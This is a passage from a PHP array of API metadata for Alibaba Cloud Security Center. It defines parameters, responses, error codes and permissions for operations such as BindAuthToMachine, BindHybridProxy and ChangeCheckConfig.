false, 'example' => '1', 'title' => ''], ], [ 'name' => 'IsPreBind', 'in' => 'query', 'schema' => ['description' => 'Specifies whether this is a pre-binding operation. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.'."\n" ."\n\n" .'> After pre-binding is enabled, the corresponding authorization quota is automatically bound to the specified servers after the purchase is completed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PreBindOrderId', 'in' => 'query', 'schema' => ['description' => 'The order ID associated with the pre-binding.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '233016**0482', 'title' => ''], ], [ 'name' => 'NtmVersion', 'in' => 'query', 'schema' => ['description' => 'The order version associated with the pre-binding. Valid values:'."\n" ."\n" .'- **level7**: Anti-virus Edition'."\n" .'- **level3**: Advanced Edition'."\n" .'- **level2**: Enterprise Edition'."\n" .'- **level8**: Ultimate Edition'."\n" .'- **level10**: value-added service only.', 'type' => 'string', 'required' => false, 'example' => 'level2', 'title' => ''], ], [ 'name' => 'Bind', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of UUIDs to bind.'."\n" ."\n" .'> **Bind** and **UnBind** cannot both be empty.', 'type' => 'array', 'items' => ['description' => 'The UUID to bind.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '44f9ee5a-e39d-46bb-833b-5fc2ff47****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'UnBind', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of UUIDs to unbind.'."\n" .'> **Bind** and **UnBind** cannot both be empty.', 'type' => 'array', 'items' => ['description' => 'The UUID to unbind.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '3e3c9d79-2880-465d-9e1b-1bc2af7d****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource folder (Alibaba Cloud account).'."\n" .'> Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'ResultCode' => ['description' => 'The status code of the binding result. Valid values:'."\n" ."\n" .'- **0**: Succeeded.'."\n" .'- **1**: Parameter error.'."\n" .'- **2**: Insufficient server authorization quota.'."\n" .'- **3**: Insufficient server core authorization quota.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E212F80', 'title' => ''], 'UnBindCount' => ['description' => 'The number of servers that are successfully unbound.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BindCount' => ['description' => 'The number of servers that are successfully bound.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InsufficientEcsCount' => ['description' => 'The number of servers for which the authorization quota is insufficient.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InsufficientCoreCount' => ['description' => 'The number of cores for which the authorization quota is insufficient.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'MissingPreBindVersion', 'errorMessage' => 'The pre-bound version is missing.', 'description' => ''], ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Bind authorization to servers', 'summary' => 'Binds authorization information to servers.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BindAuthToMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:BindAuthToMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ResultCode\\": 2,\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E212F80\\",\\n \\"UnBindCount\\": 1,\\n \\"BindCount\\": 1,\\n \\"InsufficientEcsCount\\": 1,\\n \\"InsufficientCoreCount\\": 1\\n}","type":"json"}]', ], 'BindHybridProxy' => [ 'summary' => 'Adds servers to Security Center over a proxy server. After you create a proxy cluster and deploy a proxy server, you can connect a server to the proxy cluster as a client. This way, the server is added to Security Center over the proxy server and is protected.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '169977', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sas-proxy', 'title' => ''], ], [ 'name' => 'YundunUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of servers that you want to add to Security Center over the proxy server.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'fe914136-47ff-4dc3-bd25-fdd24969****', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911459F'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911459F\\"\\n}","type":"json"}]', 'title' => 'BindHybridProxy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BindHybridProxy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:BindHybridProxy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CancelOnceTask' => [ 'summary' => 'Cancels the main task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task.'."\n" ."\n" .'> You can call the [GenerateOnceTask](~~GenerateOnceTask~~) operation to query the IDs of tasks.', 'type' => 'string', 'required' => true, 'example' => 'ec9c0d88f36cc27765a98c554ee2****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\"\\n}","type":"json"}]', 'title' => 'CancelOnceTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CancelOnceTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:CancelOnceTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ChangeAssetRefreshTaskConfig' => [ 'summary' => 'Modifies the interval of asset synchronization configurations.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '161846', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AssetRefreshConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The asset synchronization configuration.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The service provider of the cloud asset. Valid values:'."\n" ."\n" .'* **3**: Tencent Cloud'."\n" .'* **4**: Huawei Cloud'."\n" .'* **7**: Amazon Web Services (AWS) Cloud'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], 'SchedulePeriod' => ['description' => 'The synchronization cycle. Valid values:'."\n" ."\n" .'* **60**: 60 minutes'."\n" .'* **180**: 3 hours'."\n" .'* **360**: 6 hours'."\n" .'* **720**: 12 hours'."\n" .'* **1440**: 1 day'."\n" .'* **10080**: 7 days'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '360', 'title' => ''], 'Status' => ['description' => 'The status of the configuration. Valid values:'."\n" ."\n" .'* **1**: enabled'."\n" .'* **0**: disabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'RefreshConfigType' => ['description' => 'The type of the configuration. Valid values:'."\n" ."\n" .'* **0**: server synchronization task'."\n" .'* **1**: cloud service synchronization task'."\n" .'* **2**: scheduled AccessKey pair verification task'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], 'TargetId' => ['description' => 'The ID of the data entry containing the AccessKey pair that you specify when you configure the scheduled AccessKey pair verification task.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2308', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region in which your Security Center service resides.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'Data' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => 'Invalid parameter.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"Data\\": true,\\n \\"Message\\": \\"successful\\"\\n}","type":"json"}]', 'title' => 'ChangeAssetRefreshTaskConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeAssetRefreshTaskConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ChangeAssetRefreshTaskConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ChangeCheckConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '125446', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region of the Security Center instance. Valid values:'."\n" ."\n" .'- **cn-hangzhou:** China'."\n" .'- **ap-southeast-1:** Singapore', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'CycleDays', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The periodic check schedule.', 'type' => 'array', 'items' => ['description' => 'The day of the week on which the periodic check runs. Valid values: 1, 2, 3, 4, 5, 6, and 7.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start hour of the daily check time window. The start time and end time must fall within one of the following intervals. Valid values: 0, 6, 12, and 18.'."\n" ."\n" .'- **0~6**: If the start time is 0, set the end time to 6.'."\n" .'- **6~12**: If the start time is 6, set the end time to 12.'."\n" .'- **12~18**: If the start time is 12, set the end time to 18.'."\n" .'- **18~24**: If the start time is 18, set the end time to 24.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end hour of the daily check time window. The start time and end time must fall within one of the following intervals. Valid values: 6, 12, 18, and 24.'."\n" ."\n" .'- **0~6**: If the start time is 0, set the end time to 6.'."\n" .'- **6~12**: If the start time is 6, set the end time to 12.'."\n" .'- **12~18**: If the start time is 12, set the end time to 18.'."\n" .'- **18~24**: If the start time is 18, set the end time to 24.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '6', 'title' => ''], ], [ 'name' => 'StandardIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'array', 'items' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ConfigRequirementIds', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Configures the check policy by specifying requirement IDs.'."\n" ."\n" .'> Call the [ListCheckResult](~~ListCheckResult~~) operation to obtain requirement IDs. If the ConfigStandardIds parameter is specified, this parameter does not take effect.', 'type' => 'object', 'properties' => [ 'AddIds' => [ 'description' => 'The list of requirement IDs to add to the policy.', 'type' => 'array', 'items' => ['description' => 'The requirement ID to add to the policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '6', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'RemoveIds' => [ 'description' => 'The list of requirement IDs to remove from the policy.', 'type' => 'array', 'items' => ['description' => 'The requirement ID to remove from the policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '5', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'ConfigStandardIds', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Configures the check policy by specifying standard IDs.'."\n" ."\n" .'> Call the [ListCheckResult](~~ListCheckResult~~) operation to obtain standard IDs.', 'type' => 'object', 'properties' => [ 'AddIds' => [ 'description' => 'The list of standard IDs to add to the policy.', 'type' => 'array', 'items' => ['description' => 'The standard ID to add to the policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], 'RemoveIds' => [ 'description' => 'The list of standard IDs to remove from the policy.', 'type' => 'array', 'items' => ['description' => 'The standard ID to remove from the policy.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '5', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'EnableAutoCheck', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable automatic periodic checks. Valid values:'."\n" ."\n" .'- **true:** Enabled.'."\n" .'- **false:** Disabled.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'EnableAddCheck', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to check newly added check items in the selected requirements by default. Valid values:'."\n" ."\n" .'- **true:** Enabled.'."\n" .'- **false:** Disabled.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'AddedCheck', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'description' => 'The list of check items to add to the policy.'."\n" .' If the ConfigStandardIds or ConfigRequirementIds parameter is specified, this parameter does not take effect. >', 'type' => 'array', 'items' => [ 'description' => 'The check item to add to the policy.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> Call the [ListCheckResult](~~ListCheckResult~~) operation to obtain check item IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '5', 'title' => ''], 'SectionId' => ['description' => 'The section ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '69', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'RemovedCheck', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'description' => 'The list of check items to remove from the policy.'."\n" .' If the ConfigStandardIds or ConfigRequirementIds parameter is specified, this parameter does not take effect. >', 'type' => 'array', 'items' => [ 'description' => 'The check item to remove from the policy.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> Call the [ListCheckResult](~~ListCheckResult~~) operation to obtain check item IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '19', 'title' => ''], 'SectionId' => ['description' => 'The section ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '69', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud service providers.', 'type' => 'array', 'items' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **TENCENT**: Tencent Cloud'."\n" .'- **AWS**: AWS', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Configure', 'in' => 'query', 'schema' => ['description' => 'The field configuration. Valid values:'."\n" ."\n" .'- **all**: adds all check items.', 'type' => 'string', 'required' => false, 'example' => 'all', 'title' => ''], ], [ 'name' => 'SystemConfig', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the system-generated configuration. Valid values:'."\n" .'- **true**: Yes.'."\n" .'- **false**: No.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource folder (Alibaba Cloud account).'."\n" .'> Call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '6EBB8614-746D-555D-AB69-C801AEC7DCE0', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Modify cloud platform configuration check items', 'summary' => 'Modifies the check items for cloud platform configuration checks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeCheckConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ChangeCheckConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6EBB8614-746D-555D-AB69-C801AEC7DCE0\\"\\n}","type":"json"}]', ], 'ChangeCheckCustomConfig' => [ 'summary' => 'Modifies the custom configuration items of a check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '167568', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => [ 'description' => 'The region where the Security Center instance is deployed. Valid values:'."\n" ."\n" .'* **cn-hangzhou**: International'."\n" .'* **ap-southeast-1**: Singapore'."\n", 'type' => 'string', 'required' => false, 'enumValueTitles' => [], 'example' => 'cn-hangzhou', 'title' => '', ], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '76', 'title' => ''], ], [ 'name' => 'CustomConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The custom configuration items of the check item.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The custom configuration item of the check item.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the custom configuration item. The name of a custom configuration item is unique in a check item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'SessionTimeMax', 'title' => ''], 'Value' => ['description' => 'The value of the custom configuration item. The value is a string.'."\n", 'type' => 'string', 'required' => false, 'example' => '13', 'title' => ''], 'Operation' => [ 'description' => 'The operation that you want to perform on the custom configuration item. This parameter is required only if you want to delete the custom configuration item. To delete the custom configuration item, set the value to DELETE.'."\n", 'type' => 'string', 'required' => false, 'example' => 'DELETE', 'enum' => ['DELETE'], 'title' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'RepairConfigs', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The parameters required for fixing risk items.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the parameter required for fixing a risk item, which is unique in a check item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Port', 'title' => ''], 'Value' => ['description' => 'The value of the parameter required for fixing a risk item. The value is a string.'."\n", 'type' => 'string', 'required' => false, 'example' => '80', 'title' => ''], 'Operation' => [ 'description' => 'The operation that you want to perform on the custom configuration item. This parameter is required only if you want to delete the custom configuration item. To delete the custom configuration item, set the value to DELETE.'."\n", 'type' => 'string', 'required' => false, 'example' => 'DELETE', 'enum' => ['DELETE'], 'title' => '', ], 'FlowId' => ['description' => 'The ID of the fixing process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ascgrmscyjgs*********', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'DA8133CC-CCA0-5CF2-BF64-FE7D52C44***', 'title' => ''], 'IllegalCustomConfigs' => [ 'description' => 'An array that consists of the invalid custom configuration items of the check item.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The custom configuration item of the check item.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the custom configuration item, which is unique in a check item.'."\n", 'type' => 'string', 'example' => 'SessionTimeMax', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'IllegalRepairConfigs' => [ 'description' => 'An array that consists of the invalid parameters required for fixing risk items.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the invalid parameter required for fixing a risk item.'."\n", 'type' => 'string', 'example' => 'SessionTimeMax', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => 'User has not purchased this product'], ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => 'Parameter error, please check the input parameters.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DA8133CC-CCA0-5CF2-BF64-FE7D52C44***\\",\\n \\"IllegalCustomConfigs\\": [\\n {\\n \\"Name\\": \\"SessionTimeMax\\"\\n }\\n ],\\n \\"IllegalRepairConfigs\\": [\\n {\\n \\"Name\\": \\"SessionTimeMax\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ChangeCheckCustomConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeCheckCustomConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ChangeCheckCustomConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ChangeCheckScopeConfigInstance' => [ 'summary' => 'Modifies the configuration instance of a check scope.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119340', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 